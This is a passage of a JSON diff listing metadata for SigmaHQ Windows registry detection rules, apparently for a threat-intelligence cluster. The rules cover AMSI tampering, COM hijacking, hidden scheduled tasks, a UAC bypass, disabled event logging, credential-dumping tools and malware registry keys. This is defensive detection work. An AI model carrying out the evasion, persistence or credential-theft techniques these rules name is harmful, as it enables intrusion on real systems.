possible defence evasion", + "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c", + "value": "Raw Disk Access Using Illegitimate Tools", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_disk_access_using_illegitimate_tools.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1006" + ], + "creation_date": "2019/10/22", + "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate Administrator using tool for raw access or ongoing forensic investigation" + ], + "logsource.category": "raw_access_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "value": "Persistence Via New AMSI Providers", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/amsi.html", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_add_amsi_providers_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate security products adding their own AMSI providers" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of UserInitMprLogonScript persistence method", + "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "value": "Logon Scripts Creation in UserInitMprLogonScript Registry", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1037/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml" + ], + "tags": [ + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" + ], + "creation_date": "2019/01/12", + "filename": "registry_add_logon_scripts_userinitmprlogonscript_reg.yml", + "author": "Tom Ueltschi (@c_APT_ure)", + "level": "high", + "falsepositive": [ + "Exclude legitimate logon scripts" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Attempts to detect registry events for common NetWire key HKCU\\Software\\NetWire", + "uuid": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "value": "NetWire RAT Registry Key", + "meta": { + "refs": [ + "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", + "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", + "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2021/10/07", + "filename": "registry_add_mal_netwire.yml", + "author": "Christopher Peacock", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects new registry key created by Ursnif malware.", + "uuid": "21f17060-b282-4249-ade0-589ea3591558", + "value": "Ursnif", + "meta": { + "refs": [ + "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112" + ], + "creation_date": "2019/02/13", + "filename": "registry_add_mal_ursnif.yml", + "author": "megan201296", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects COM object hijacking via TreatAs subkey", + "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "value": "Windows Registry Persistence COM Key Linking", + "meta": { + "refs": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_key_linking.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2019/10/23", + "filename": "registry_add_persistence_key_linking.yml", + "author": "Kutepov Anton, oscd.community", + "level": "medium", + "falsepositive": [ + "Maybe some system utilities in rare cases use linking keys for backward compatibility" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects the of the \"accepteula\" key related to sysinternals tools being created from non sysinternals tools", + "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", + "value": "Usage of Renamed Sysinternals Tools", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], + "creation_date": "2022/08/24", + "filename": "registry_add_renamed_sysinternals_eula_accepted.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of Suspicious Sysinternals Tools such as PsExec, Procdump...etc via the \"accepteula\" key being added to Registry", + "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "value": "Usage of Suspicious Sysinternals Tools", + "meta": { + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], + "creation_date": "2022/08/24", + "filename": "registry_add_susp_sysinternals_eula_accepted.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of SysInternals tools" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of Sysinternals Tools due to accepteula key being added to Registry", + "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", + "value": "Usage of Sysinternals Tools - Registry", + "meta": { + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], + "creation_date": "2017/08/28", + "filename": "registry_add_sysinternals_eula_accepted.yml", + "author": "Markus Neis", + "level": "low", + "falsepositive": [ + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "A General detection to trigger for the creation or modification of .*\\Software\\Sysinternals\\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.", + "uuid": "9841b233-8df8-4ad7-9133-b0b4402a9014", + "value": "Sysinternals SDelete Registry Keys", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/9", + "https://threathunterplaybook.com/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_sdelete_registry_keys.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2020/05/02", + "filename": "registry_add_sysinternals_sdelete_registry_keys.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box [\u2026]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "uuid": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "value": "Persistence Via Disk Cleanup Handler - NewEntry", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_set_disk_cleanup_handler_new_entry_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_disk_cleanup_handler_new_entry_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate new entry added by windows" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. Which could indicate an attacker trying to launch an encryption process", + "uuid": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "value": "Removal Of Folder From ProtectedFolders In Exploit Guard", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/05", + "filename": "registry_delete_exploit_guard_protected_folders.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate administrators removing applications (should always be monitored)" + ], + "logsource.category": "registry_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "uuid": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "value": "Terminal Server Client Connection History Cleared", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", + "http://woshub.com/how-to-clear-rdp-connections-history/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1112" + ], + "creation_date": "2021/10/19", + "filename": "registry_delete_mstsc_history_cleared.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_delete", + "logsource.product": "windows" + } + }, + { + "description": "Remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection", + "uuid": "41d1058a-aea7-4952-9293-29eaaf516465", + "value": "Removal Of Amsi Provider Reg Key", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://seclists.org/fulldisclosure/2020/Mar/45", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/06/07", + "filename": "registry_delete_removal_amsi_registry_key.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_delete", + "logsource.product": "windows" + } + }, + { + "description": "A General detection to trigger for processes removing .*\\shell\\open\\command registry keys. Registry keys that might have been used for COM hijacking activities.", + "uuid": "96f697b0-b499-4e5d-9908-a67bec11cdb6", + "value": "Removal of Potential COM Hijacking Registry Keys", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/7", + "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", + "https://docs.microsoft.com/en-us/windows/win32/shell/launch", + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/05/02", + "filename": "registry_delete_removal_com_hijacking_registry_key.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" + ], + "logsource.category": "registry_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", + "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "value": "Removal Of Index Value to Hide Schedule Task", + "meta": { + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2022/08/26", + "filename": "registry_delete_removal_index_value_scheduled_task_hide.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_delete", + "logsource.product": "windows" + } + }, + { + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", + "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "value": "Removal Of SD Value to Hide Schedule Task", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2022/04/15", + "filename": "registry_delete_removal_sd_value_scheduled_task_hide.yml", + "author": "Sittikorn S", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_delete", + "logsource.product": "windows" + } + }, + { + "description": "Sysmon registry detection of a local hidden user account.", + "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "value": "Creation of a Local Hidden User Account by Registry", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1387530414185664538", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ], + "creation_date": "2021/05/03", + "filename": "registry_event_add_local_hidden_user.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "uuid": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "value": "Chafer Activity - Registry", + "meta": { + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/03/23", + "filename": "registry_event_apt_chafer_mar18.yml", + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "uuid": "70d43542-cd2d-483c-8f30-f16b436fd7db", + "value": "Leviathan Registry Key Activity", + "meta": { + "refs": [ + "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_leviathan.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2020/07/07", + "filename": "registry_event_apt_leviathan.yml", + "author": "Aidan Bracher", + "level": "critical", + "falsepositive": "No established falsepositives", + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "uuid": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", + "value": "OceanLotus Registry Activity", + "meta": { + "refs": [ + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://github.com/eset/malware-ioc/tree/master/oceanlotus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2019/04/14", + "filename": "registry_event_apt_oceanlotus_registry.yml", + "author": "megan201296, Jonhnathan Ribeiro", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects Pandemic Windows Implant", + "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "value": "Pandemic Registry Key", + "meta": { + "refs": [ + "https://wikileaks.org/vault7/#Pandemic", + "https://twitter.com/MalwareJake/status/870349480356454401", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ], + "creation_date": "2017/06/01", + "filename": "registry_event_apt_pandemic.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "value": "UAC Bypass Via Wsreset", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2020/10/07", + "filename": "registry_event_bypass_via_wsreset.yml", + "author": "oscd.community, Dmitry Uchakin", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "value": "CMSTP Execution Registry Event", + "meta": { + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ], + "creation_date": "2018/07/16", + "filename": "registry_event_cmstp_execution_by_registry.yml", + "author": "Nik Seetharaman", + "level": "high", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "uuid": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "value": "Disable Security Events Logging Adding Reg Key MiniNt", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1182516740955226112", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ], + "creation_date": "2019/10/25", + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml", + "author": "Ilyas Ochkov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "uuid": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "value": "Wdigest CredGuard Registry Modification", + "meta": { + "refs": [ + "https://teamhydra.blog/2020/08/25/bypassing-credential-guard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2019/08/25", + "filename": "registry_event_disable_wdigest_credential_guard.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", + "value": "Esentutl Volume Shadow Copy Service Keys", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2020/10/20", + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Windows Credential Editor (WCE)", + "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "value": "Windows Credential Editor Registry", + "meta": { + "refs": [ + "https://www.ampliasecurity.com/research/windows-credentials-editor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" + ], + "creation_date": "2019/12/31", + "filename": "registry_event_hack_wce_reg.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "value": "HybridConnectionManager Service Installation - Registry", + "meta": { + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1608" + ], + "creation_date": "2021/04/12", + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the presence of a registry key created during Azorult execution", + "uuid": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "value": "Registry Entries For Azorult Malware", + "meta": { + "refs": [ + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112" + ], + "creation_date": "2020/05/08", + "filename": "registry_event_mal_azorult.yml", + "author": "Trent Liffick", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects FlowCloud malware from threat group TA410.", + "uuid": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "value": "FlowCloud Malware", + "meta": { + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_flowcloud.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ], + "creation_date": "2020/06/09", + "filename": "registry_event_mal_flowcloud.yml", + "author": "NVISO", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "value": "PrinterNightmare Mimimkatz Driver Name", + "meta": { + "refs": [ + "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", + "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" + ], + "creation_date": "2021/07/04", + "filename": "registry_event_mimikatz_printernightmare.yml", + "author": "Markus Neis, @markus_neis, Florian Roth", + "level": "critical", + "falsepositive": [ + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "value": "Path To Screensaver Binary Modified", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.002" + ], + "creation_date": "2020/10/11", + "filename": "registry_event_modify_screensaver_binary_path.yml", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate modification of screensaver" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "uuid": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "value": "Narrator's Feedback-Hub Persistence", + "meta": { + "refs": [ + "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_event_narrator_feedback_persistance.yml", + "author": "Dmitriy Lifanov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects NetNTLM downgrade attack", + "uuid": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "value": "NetNTLM Downgrade Attack - Registry", + "meta": { + "refs": [ + "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ], + "creation_date": "2018/03/20", + "filename": "registry_event_net_ntlm_downgrade.yml", + "author": "Florian Roth, wagga", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "value": "New DLL Added to AppCertDlls Registry Key", + "meta": { + "refs": [ + "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", + "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.009" + ], + "creation_date": 